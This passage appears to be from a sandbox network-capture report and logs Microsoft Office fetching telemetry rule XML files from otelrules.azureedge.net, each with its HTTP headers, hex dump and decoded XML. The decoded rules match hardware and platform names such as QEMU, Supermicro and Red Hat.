                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      72192.168.2.74978113.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:54 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:54 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 474
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                                      x-ms-request-id: 957844e9-801e-008c-4868-3b7130000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164154Z-185f5d8b95cdtclvhC1NYC4rmc0000000ang00000000eyhz
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:54 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      73192.168.2.74978213.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:54 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:54 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 408
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                                                      x-ms-request-id: d35eaebc-501e-0064-178c-3a1f54000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164154Z-1777c6cb754wcxkwhC1TEB3c6w00000009q000000000v0wu
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:54 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      74192.168.2.74978313.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:54 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:54 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 469
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                                                      x-ms-request-id: 495def62-b01e-0098-458c-3acead000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164154Z-185f5d8b95cx9g8lhC1NYCtgvc00000002qg000000016zze
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:54 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      75192.168.2.74978513.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:56 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:56 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:56 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                                                      x-ms-request-id: 171aa64f-101e-005a-5b63-3b882b000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164156Z-185f5d8b95cdh56ghC1NYCk1x400000004cg0000000074cs
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:56 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      76192.168.2.74978713.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:56 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:56 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 475
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BBA740822"
                                                                                                                                                                                                                      x-ms-request-id: 9cb1ed33-701e-0021-398c-3a3d45000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164156Z-185f5d8b95c96jn4hC1NYCbgp80000000ag000000000h0y4
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:57 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      77192.168.2.74979213.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:56 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:56 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 427
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB464F255"
                                                                                                                                                                                                                      x-ms-request-id: 5c5a59ff-301e-003f-5b8c-3a266f000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164156Z-1777c6cb754xrr98hC1TEB3kag00000009mg00000000sd2f
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:57 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      78192.168.2.74978613.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:56 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:56 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 432
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                                                      x-ms-request-id: 41283c59-801e-0015-058c-3af97f000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164156Z-185f5d8b95crl6swhC1NYC3ueg0000000aq0000000007rs7
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:57 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      79192.168.2.74978413.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:56 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:57 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 416
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                                                      x-ms-request-id: 9cc78053-901e-008f-7b8c-3a67a6000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164157Z-r1d97b99577ckpmjhC1TEBrzs0000000094g00000000dwe2
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:57 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      80192.168.2.74979713.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:58 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:58 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 474
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                                                      x-ms-request-id: 4f8e9926-c01e-00ad-7c8c-3aa2b9000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164158Z-185f5d8b95cp7lkfhC1NYC7rpw0000000am000000000qbyg
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:59 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      81192.168.2.74980213.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:58 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:59 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 405
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B942B6AFF"
